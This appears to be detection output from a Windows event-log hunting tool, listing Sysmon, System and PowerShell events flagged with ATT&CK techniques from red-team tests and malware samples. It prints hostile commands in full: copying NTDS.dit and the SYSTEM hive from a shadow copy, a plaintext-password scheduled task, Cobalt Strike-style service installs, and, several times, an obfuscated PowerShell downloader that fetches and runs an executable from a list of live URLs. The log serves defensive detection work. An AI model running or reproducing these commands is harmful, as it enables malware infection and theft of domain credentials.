C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe" /c "SCHTASKS /Create /S localhost /RU DOMAIN\user /RP At0micStrong /TN " Atomic "task /TR C:\windows\system32\cmd.exe /SC daily /ST 20:10"
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-D6F7-5D31-0000-00104ACE2500
3912
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1563549125.755598,2019-07-19T19:12:05.755598+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding)",1,"
1
5
4
1
0
0x8000000000000000
4135
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 15:11:50.383
747F3D96-DDB6-5D31-0000-0010273D4C00
3952
C:\Windows\System32\rundll32.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows host process (Rundll32)
Microsoft® Windows® Operating System
Microsoft Corporation
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Windows\system32\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-0020FF090500
0x509ff
1
Medium
SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
747F3D96-D4A4-5D31-0000-0010DD6D0000
804
C:\Windows\System32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1563549125.755598,2019-07-19T19:12:05.755598+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding )",1,"
1
5
4
1
0
0x8000000000000000
4135
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 15:11:50.383
747F3D96-DDB6-5D31-0000-0010273D4C00
3952
C:\Windows\System32\rundll32.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows host process (Rundll32)
Microsoft® Windows® Operating System
Microsoft Corporation
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Windows\system32\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-0020FF090500
0x509ff
1
Medium
SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
747F3D96-D4A4-5D31-0000-0010DD6D0000
804
C:\Windows\System32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1085] Rundll32 Execution detected,1563549125.755598,2019-07-19T19:12:05.755598+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding )",1,"
1
5
4
1
0
0x8000000000000000
4135
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 15:11:50.383
747F3D96-DDB6-5D31-0000-0010273D4C00
3952
C:\Windows\System32\rundll32.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows host process (Rundll32)
Microsoft® Windows® Operating System
Microsoft Corporation
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Windows\system32\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-0020FF090500
0x509ff
1
Medium
SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
747F3D96-D4A4-5D31-0000-0010DD6D0000
804
C:\Windows\System32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563549087.258254,2019-07-19T19:11:27.258254+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg save HKLM\SYSTEM C:\Extract\SYSTEM_HIVE" ),1,"
1
5
4
1
0
0x8000000000000000
4133
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 15:11:27.220
747F3D96-DD9F-5D31-0000-001041504B00
6508
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe" /c "reg save HKLM\SYSTEM C:\Extract\SYSTEM_HIVE"
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-DD47-5D31-0000-001015874900
5840
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563549087.233257,2019-07-19T19:11:27.233257+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\Extract\VSC_SYSTEM_HIVE" ),1,"
1
5
4
1
0
0x8000000000000000
4132
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 15:11:27.192
747F3D96-DD9F-5D31-0000-00102D4D4B00
976
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe" /c "copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\Extract\VSC_SYSTEM_HIVE"
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-DD47-5D31-0000-001015874900
5840
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563549087.202862,2019-07-19T19:11:27.202862+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\Extract\ntds.dit" ),1,"
1
5
4
1
0
0x8000000000000000
4131
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 15:11:27.156
747F3D96-DD9F-5D31-0000-00101A4A4B00
5772
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe" /c "copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\Extract\ntds.dit"
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-DD47-5D31-0000-001015874900
5840
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563549087.169217,2019-07-19T19:11:27.169217+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1,"
1
5
4
1
0
0x8000000000000000
4130
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 15:11:27.069
747F3D96-DD9F-5D31-0000-00107B454B00
3344
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe" /c
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-DD47-5D31-0000-001015874900
5840
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
Service installed in the system,1557665564.155703,2019-05-12T16:52:44.155703+04:00,,Audit,High,"Service installed in the system with Name ( WinPwnage ) , File Name ( %COMSPEC% /c ping -n 1 127.0.0.1 >nul && echo 'WinPwnage' > \\.\pipe\WinPwnagePipe ) , Service Type ( user mode service ) , Service Start Type ( demand start ) , Service Account ( LocalSystem )",7045,"
7045
0
4
0
0
0x8080000000000000
10446
System
IEWIN7
WinPwnage
%COMSPEC% /c ping -n 1 127.0.0.1 >nul && echo 'WinPwnage' > \\.\pipe\WinPwnagePipe
user mode service
demand start
LocalSystem
",IEWIN7,System
cobalt strike service detected installed in the system,1557665564.155703,2019-05-12T16:52:44.155703+04:00,,Threat,Critical,cobalt strike or meterpreter service detected installed in the system,7045,"
7045
0
4
0
0
0x8080000000000000
10446
System
IEWIN7
WinPwnage
%COMSPEC% /c ping -n 1 127.0.0.1 >nul && echo 'WinPwnage' > \\.\pipe\WinPwnagePipe
user mode service
demand start
LocalSystem
",IEWIN7,System
Service installed in the system,-11644473600.0,1601-01-01T04:00:00+04:00,,Audit,High,"Service installed in the system with Name ( remotesvc ) , File Name ( calc.exe ) , Service Type ( user mode service ) , Service Start Type ( auto start ) , Service Account ( LocalSystem )",7045,"
7045
0
4
0
0
0x8080000000000000
6045
System
WIN-77LTAPHIQ1R.example.corp
remotesvc
calc.exe
user mode service
auto start
LocalSystem
",WIN-77LTAPHIQ1R.example.corp,System
System Logs Cleared,-11644473600.0,1601-01-01T04:00:00+04:00,,Audit,High,System Logs Cleared,104,"
104
0
4
104
0
0x8000000000000000
27736
System
PC01.example.corp
user01
EXAMPLE
System
",PC01.example.corp,System
Service installed in the system,1551605354.168476,2019-03-03T13:29:14.168476+04:00,,Audit,High,"Service installed in the system with Name ( spoolsv ) , File Name ( cmd.exe ) , Service Type ( user mode service ) , Service Start Type ( auto start ) , Service Account ( LocalSystem )",7045,"
7045
0
4
0
0
0x8080000000000000
4482
System
WIN-77LTAPHIQ1R.example.corp
spoolsv
cmd.exe
user mode service
auto start
LocalSystem
",WIN-77LTAPHIQ1R.example.corp,System
Service installed in the system,1551605038.85688,2019-03-03T13:23:58.856880+04:00,,Audit,High,"Service installed in the system with Name ( spoolfool ) , File Name ( cmd.exe ) , Service Type ( user mode service ) , Service Start Type ( auto start ) , Service Account ( LocalSystem )",7045,"
7045
0
4
0
0
0x8080000000000000
4480
System
WIN-77LTAPHIQ1R.example.corp
spoolfool
cmd.exe
user mode service
auto start
LocalSystem
",WIN-77LTAPHIQ1R.example.corp,System
Powershell Executing Pipeline - Suspicious Powershell Commands detected,1598418573.34971,2020-08-26T09:09:33.349710+04:00,,Threat,Critical,"Found User (DESKTOP-RIPCLIP\Clippy) run Suspicious PowerShell commands that include (Net.WebClient,Net.WebClient,Net.WebClient,Net.WebClient,$env:TEMP\,char,-f , -Force,foreach,$Env:Temp\,Net.WebClient,\Windows\System32) in event with Command Line ($Va5w3n8=(('Q'+'2h')+('w9p'+'1'));&('ne'+'w-'+'item') $eNV:teMP\WOrd\2019\ -itemtype DIrectOry;[Net.ServicePointManager]::"SecURi`T`ypRO`T`oCOL" = ('t'+'ls'+'1'+('2, tl'+'s')+'11'+(', '+'tls'));$Depssu0 = (('D'+'yx')+('x'+'ur4g')+'x');$A74_j9r=('T'+'4'+('gf45'+'h'));$Fdkhtf_=$env:temp+(('{0}'+'word{'+'0}'+('2'+'01')+'9{0}') -F [CHAr]92)+$Depssu0+('.'+('ex'+'e'));$O39nj1p=('J6'+'9l'+('hm'+'h'));$Z8i525z=&('new-'+'obje'+'c'+'t') neT.WEbcLiENt;$Iwmfahs=(('h'+'ttp')+(':'+'//')+('q'+'u'+'anticaelectro'+'n'+'ic')+('s.com'+'/')+'w'+'p-'+'a'+('d'+'min')+'/'+'7A'+('Tr78'+'/*'+'htt')+('p'+'s:/')+('/r'+'e')+'be'+('l'+'co')+'m'+'.'+('ch/'+'pi'+'c')+('ture'+'_')+('l'+'ibra'+'ry/bbCt')+('l'+'S/')+('*ht'+'tp'+'s:/')+('/re'+'al')+'e'+'s'+('tate'+'a')+('gen'+'t')+'te'+('am.co'+'m')+'/'+('163/Q'+'T')+'d'+('/'+'*ht'+'tps:')+'//'+('w'+'ww.')+('ri'+'dd')+('hi'+'display.'+'c'+'o')+'m/'+'r'+'id'+'d'+('hi'+'/1pKY/'+'*htt')+'p'+(':'+'//')+('radi'+'osu'+'bmit.com/'+'sear')+('ch_'+'tes'+'t')+'/'+'p'+('/*'+'h')+('ttp'+':/')+'/'+('res'+'e')+'ar'+('ch'+'c')+'he'+'m'+('plu'+'s.'+'c')+('om/w'+'p-')+('a'+'dmin')+'/1'+('OC'+'C')+'/'+('*http:'+'/')+('/s'+'zymo')+('ns'+'zyp')+'er'+('sk'+'i')+('.'+'pl/a')+'ss'+('ets/'+'p')+'k/')."S`Plit"([char]42);$Zxnbryr=(('Dp'+'z9')+'4'+'a6');foreach($Mqku5a2 in $Iwmfahs){try{$Z8i525z."d`OWN`load`FIlE"($Mqku5a2, $Fdkhtf_);$Lt8bjj7=('Ln'+('wp'+'ag')+'m');If ((.('Get-I'+'t'+'em') $Fdkhtf_)."le`NgTH" -ge 28315) {cp (gcm calc).path $Fdkhtf_ -Force; 
.('Invo'+'ke'+'-Item')($Fdkhtf_);$Nfgrgu9=(('Qj6'+'bs')+'x'+'n');break;$D7ypgo1=('Bv'+('e'+'bc')+'k0')}}catch{}}$Gmk6zmk=(('Z2x'+'aaj')+'0'),CommandInvocation(Get-Item): "Get-Item") and full command (C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe) ",800,"
800
0
4
8
0
0x80000000000000
789
Windows PowerShell
DESKTOP-RIPCLIP
$Va5w3n8=(('Q'+'2h')+('w9p'+'1'));&('ne'+'w-'+'item') $eNV:teMP\WOrd\2019\ -itemtype DIrectOry;[Net.ServicePointManager]::"SecURi`T`ypRO`T`oCOL" = ('t'+'ls'+'1'+('2, tl'+'s')+'11'+(', '+'tls'));$Depssu0 = (('D'+'yx')+('x'+'ur4g')+'x');$A74_j9r=('T'+'4'+('gf45'+'h'));$Fdkhtf_=$env:temp+(('{0}'+'word{'+'0}'+('2'+'01')+'9{0}') -F [CHAr]92)+$Depssu0+('.'+('ex'+'e'));$O39nj1p=('J6'+'9l'+('hm'+'h'));$Z8i525z=&('new-'+'obje'+'c'+'t') neT.WEbcLiENt;$Iwmfahs=(('h'+'ttp')+(':'+'//')+('q'+'u'+'anticaelectro'+'n'+'ic')+('s.com'+'/')+'w'+'p-'+'a'+('d'+'min')+'/'+'7A'+('Tr78'+'/*'+'htt')+('p'+'s:/')+('/r'+'e')+'be'+('l'+'co')+'m'+'.'+('ch/'+'pi'+'c')+('ture'+'_')+('l'+'ibra'+'ry/bbCt')+('l'+'S/')+('*ht'+'tp'+'s:/')+('/re'+'al')+'e'+'s'+('tate'+'a')+('gen'+'t')+'te'+('am.co'+'m')+'/'+('163/Q'+'T')+'d'+('/'+'*ht'+'tps:')+'//'+('w'+'ww.')+('ri'+'dd')+('hi'+'display.'+'c'+'o')+'m/'+'r'+'id'+'d'+('hi'+'/1pKY/'+'*htt')+'p'+(':'+'//')+('radi'+'osu'+'bmit.com/'+'sear')+('ch_'+'tes'+'t')+'/'+'p'+('/*'+'h')+('ttp'+':/')+'/'+('res'+'e')+'ar'+('ch'+'c')+'he'+'m'+('plu'+'s.'+'c')+('om/w'+'p-')+('a'+'dmin')+'/1'+('OC'+'C')+'/'+('*http:'+'/')+('/s'+'zymo')+('ns'+'zyp')+'er'+('sk'+'i')+('.'+'pl/a')+'ss'+('ets/'+'p')+'k/')."S`Plit"([char]42);$Zxnbryr=(('Dp'+'z9')+'4'+'a6');foreach($Mqku5a2 in $Iwmfahs){try{$Z8i525z."d`OWN`load`FIlE"($Mqku5a2, $Fdkhtf_);$Lt8bjj7=('Ln'+('wp'+'ag')+'m');If ((.('Get-I'+'t'+'em') $Fdkhtf_)."le`NgTH" -ge 28315) {cp (gcm calc).path $Fdkhtf_ -Force; .('Invo'+'ke'+'-Item')($Fdkhtf_);$Nfgrgu9=(('Qj6'+'bs')+'x'+'n');break;$D7ypgo1=('Bv'+('e'+'bc')+'k0')}}catch{}}$Gmk6zmk=(('Z2x'+'aaj')+'0'), DetailSequence=1
DetailTotal=1
SequenceNumber=27
UserId=DESKTOP-RIPCLIP\Clippy
HostName=ConsoleHost
HostVersion=5.1.19041.1
HostId=7d5cb8a8-0a62-4f52-ba67-09f94d24e1b7
HostApplication=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
EngineVersion=5.1.19041.1
RunspaceId=b385ee3b-6b79-46f4-a038-8be3065370c3
PipelineId=6
ScriptName=
CommandLine=$Va5w3n8=(('Q'+'2h')+('w9p'+'1'));&('ne'+'w-'+'item') $eNV:teMP\WOrd\2019\ -itemtype DIrectOry;[Net.ServicePointManager]::"SecURi`T`ypRO`T`oCOL" = ('t'+'ls'+'1'+('2, tl'+'s')+'11'+(', '+'tls'));$Depssu0 = (('D'+'yx')+('x'+'ur4g')+'x');$A74_j9r=('T'+'4'+('gf45'+'h'));$Fdkhtf_=$env:temp+(('{0}'+'word{'+'0}'+('2'+'01')+'9{0}') -F [CHAr]92)+$Depssu0+('.'+('ex'+'e'));$O39nj1p=('J6'+'9l'+('hm'+'h'));$Z8i525z=&('new-'+'obje'+'c'+'t') neT.WEbcLiENt;$Iwmfahs=(('h'+'ttp')+(':'+'//')+('q'+'u'+'anticaelectro'+'n'+'ic')+('s.com'+'/')+'w'+'p-'+'a'+('d'+'min')+'/'+'7A'+('Tr78'+'/*'+'htt')+('p'+'s:/')+('/r'+'e')+'be'+('l'+'co')+'m'+'.'+('ch/'+'pi'+'c')+('ture'+'_')+('l'+'ibra'+'ry/bbCt')+('l'+'S/')+('*ht'+'tp'+'s:/')+('/re'+'al')+'e'+'s'+('tate'+'a')+('gen'+'t')+'te'+('am.co'+'m')+'/'+('163/Q'+'T')+'d'+('/'+'*ht'+'tps:')+'//'+('w'+'ww.')+('ri'+'dd')+('hi'+'display.'+'c'+'o')+'m/'+'r'+'id'+'d'+('hi'+'/1pKY/'+'*htt')+'p'+(':'+'//')+('radi'+'osu'+'bmit.com/'+'sear')+('ch_'+'tes'+'t')+'/'+'p'+('/*'+'h')+('ttp'+':/')+'/'+('res'+'e')+'ar'+('ch'+'c')+'he'+'m'+('plu'+'s.'+'c')+('om/w'+'p-')+('a'+'dmin')+'/1'+('OC'+'C')+'/'+('*http:'+'/')+('/s'+'zymo')+('ns'+'zyp')+'er'+('sk'+'i')+('.'+'pl/a')+'ss'+('ets/'+'p')+'k/')."S`Plit"([char]42);$Zxnbryr=(('Dp'+'z9')+'4'+'a6');foreach($Mqku5a2 in $Iwmfahs){try{$Z8i525z."d`OWN`load`FIlE"($Mqku5a2, $Fdkhtf_);$Lt8bjj7=('Ln'+('wp'+'ag')+'m');If ((.('Get-I'+'t'+'em') $Fdkhtf_)."le`NgTH" -ge 28315) {cp (gcm calc).path $Fdkhtf_ -Force; .('Invo'+'ke'+'-Item')($Fdkhtf_);$Nfgrgu9=(('Qj6'+'bs')+'x'+'n');break;$D7ypgo1=('Bv'+('e'+'bc')+'k0')}}catch{}}$Gmk6zmk=(('Z2x'+'aaj')+'0'),CommandInvocation(Get-Item): "Get-Item"
ParameterBinding(Get-Item): name="Path"; value="C:\Users\Clippy\AppData\Local\Temp\word\2019\Dyxxur4gx.exe"
",DESKTOP-RIPCLIP,Windows PowerShell
Powershell Executing Pipeline - Suspicious Powershell Commands detected,1598418569.11515,2020-08-26T09:09:29.115150+04:00,,Threat,Critical,"Found User (DESKTOP-RIPCLIP\Clippy) run Suspicious PowerShell commands that include (New-Object,Net.WebClient,Net.WebClient,New-Object,Net.WebClient,Net.WebClient,$env:TEMP\,char,-f , -Force,foreach,$Env:Temp\,Net.WebClient,new-object,\Windows\System32) in event with Command Line ($Va5w3n8=(('Q'+'2h')+('w9p'+'1'));&('ne'+'w-'+'item') $eNV:teMP\WOrd\2019\ -itemtype DIrectOry;[Net.ServicePointManager]::"SecURi`T`ypRO`T`oCOL" = ('t'+'ls'+'1'+('2, tl'+'s')+'11'+(', '+'tls'));$Depssu0 = (('D'+'yx')+('x'+'ur4g')+'x');$A74_j9r=('T'+'4'+('gf45'+'h'));$Fdkhtf_=$env:temp+(('{0}'+'word{'+'0}'+('2'+'01')+'9{0}') -F [CHAr]92)+$Depssu0+('.'+('ex'+'e'));$O39nj1p=('J6'+'9l'+('hm'+'h'));$Z8i525z=&('new-'+'obje'+'c'+'t') neT.WEbcLiENt;$Iwmfahs=(('h'+'ttp')+(':'+'//')+('q'+'u'+'anticaelectro'+'n'+'ic')+('s.com'+'/')+'w'+'p-'+'a'+('d'+'min')+'/'+'7A'+('Tr78'+'/*'+'htt')+('p'+'s:/')+('/r'+'e')+'be'+('l'+'co')+'m'+'.'+('ch/'+'pi'+'c')+('ture'+'_')+('l'+'ibra'+'ry/bbCt')+('l'+'S/')+('*ht'+'tp'+'s:/')+('/re'+'al')+'e'+'s'+('tate'+'a')+('gen'+'t')+'te'+('am.co'+'m')+'/'+('163/Q'+'T')+'d'+('/'+'*ht'+'tps:')+'//'+('w'+'ww.')+('ri'+'dd')+('hi'+'display.'+'c'+'o')+'m/'+'r'+'id'+'d'+('hi'+'/1pKY/'+'*htt')+'p'+(':'+'//')+('radi'+'osu'+'bmit.com/'+'sear')+('ch_'+'tes'+'t')+'/'+'p'+('/*'+'h')+('ttp'+':/')+'/'+('res'+'e')+'ar'+('ch'+'c')+'he'+'m'+('plu'+'s.'+'c')+('om/w'+'p-')+('a'+'dmin')+'/1'+('OC'+'C')+'/'+('*http:'+'/')+('/s'+'zymo')+('ns'+'zyp')+'er'+('sk'+'i')+('.'+'pl/a')+'ss'+('ets/'+'p')+'k/')."S`Plit"([char]42);$Zxnbryr=(('Dp'+'z9')+'4'+'a6');foreach($Mqku5a2 in $Iwmfahs){try{$Z8i525z."d`OWN`load`FIlE"($Mqku5a2, $Fdkhtf_);$Lt8bjj7=('Ln'+('wp'+'ag')+'m');If ((.('Get-I'+'t'+'em') $Fdkhtf_)."le`NgTH" -ge 28315) {cp (gcm calc).path $Fdkhtf_ -Force; 
.('Invo'+'ke'+'-Item')($Fdkhtf_);$Nfgrgu9=(('Qj6'+'bs')+'x'+'n');break;$D7ypgo1=('Bv'+('e'+'bc')+'k0')}}catch{}}$Gmk6zmk=(('Z2x'+'aaj')+'0'),CommandInvocation(New-Object): "New-Object") and full command (C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe) ",800,"
800
0
4
8
0
0x80000000000000
787
Windows PowerShell
DESKTOP-RIPCLIP
$Va5w3n8=(('Q'+'2h')+('w9p'+'1'));&('ne'+'w-'+'item') $eNV:teMP\WOrd\2019\ -itemtype DIrectOry;[Net.ServicePointManager]::"SecURi`T`ypRO`T`oCOL" = ('t'+'ls'+'1'+('2, tl'+'s')+'11'+(', '+'tls'));$Depssu0 = (('D'+'yx')+('x'+'ur4g')+'x');$A74_j9r=('T'+'4'+('gf45'+'h'));$Fdkhtf_=$env:temp+(('{0}'+'word{'+'0}'+('2'+'01')+'9{0}') -F [CHAr]92)+$Depssu0+('.'+('ex'+'e'));$O39nj1p=('J6'+'9l'+('hm'+'h'));$Z8i525z=&('new-'+'obje'+'c'+'t') neT.WEbcLiENt;$Iwmfahs=(('h'+'ttp')+(':'+'//')+('q'+'u'+'anticaelectro'+'n'+'ic')+('s.com'+'/')+'w'+'p-'+'a'+('d'+'min')+'/'+'7A'+('Tr78'+'/*'+'htt')+('p'+'s:/')+('/r'+'e')+'be'+('l'+'co')+'m'+'.'+('ch/'+'pi'+'c')+('ture'+'_')+('l'+'ibra'+'ry/bbCt')+('l'+'S/')+('*ht'+'tp'+'s:/')+('/re'+'al')+'e'+'s'+('tate'+'a')+('gen'+'t')+'te'+('am.co'+'m')+'/'+('163/Q'+'T')+'d'+('/'+'*ht'+'tps:')+'//'+('w'+'ww.')+('ri'+'dd')+('hi'+'display.'+'c'+'o')+'m/'+'r'+'id'+'d'+('hi'+'/1pKY/'+'*htt')+'p'+(':'+'//')+('radi'+'osu'+'bmit.com/'+'sear')+('ch_'+'tes'+'t')+'/'+'p'+('/*'+'h')+('ttp'+':/')+'/'+('res'+'e')+'ar'+('ch'+'c')+'he'+'m'+('plu'+'s.'+'c')+('om/w'+'p-')+('a'+'dmin')+'/1'+('OC'+'C')+'/'+('*http:'+'/')+('/s'+'zymo')+('ns'+'zyp')+'er'+('sk'+'i')+('.'+'pl/a')+'ss'+('ets/'+'p')+'k/')."S`Plit"([char]42);$Zxnbryr=(('Dp'+'z9')+'4'+'a6');foreach($Mqku5a2 in $Iwmfahs){try{$Z8i525z."d`OWN`load`FIlE"($Mqku5a2, $Fdkhtf_);$Lt8bjj7=('Ln'+('wp'+'ag')+'m');If ((.('Get-I'+'t'+'em') $Fdkhtf_)."le`NgTH" -ge 28315) {cp (gcm calc).path $Fdkhtf_ -Force; .('Invo'+'ke'+'-Item')($Fdkhtf_);$Nfgrgu9=(('Qj6'+'bs')+'x'+'n');break;$D7ypgo1=('Bv'+('e'+'bc')+'k0')}}catch{}}$Gmk6zmk=(('Z2x'+'aaj')+'0'), DetailSequence=1
DetailTotal=1
SequenceNumber=23
UserId=DESKTOP-RIPCLIP\Clippy
HostName=ConsoleHost
HostVersion=5.1.19041.1
HostId=7d5cb8a8-0a62-4f52-ba67-09f94d24e1b7
HostApplication=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
EngineVersion=5.1.19041.1
RunspaceId=b385ee3b-6b79-46f4-a038-8be3065370c3
PipelineId=6
ScriptName=
CommandLine=$Va5w3n8=(('Q'+'2h')+('w9p'+'1'));&('ne'+'w-'+'item') $eNV:teMP\WOrd\2019\ -itemtype DIrectOry;[Net.ServicePointManager]::"SecURi`T`ypRO`T`oCOL" = ('t'+'ls'+'1'+('2, tl'+'s')+'11'+(', '+'tls'));$Depssu0 = (('D'+'yx')+('x'+'ur4g')+'x');$A74_j9r=('T'+'4'+('gf45'+'h'));$Fdkhtf_=$env:temp+(('{0}'+'word{'+'0}'+('2'+'01')+'9{0}') -F [CHAr]92)+$Depssu0+('.'+('ex'+'e'));$O39nj1p=('J6'+'9l'+('hm'+'h'));$Z8i525z=&('new-'+'obje'+'c'+'t') 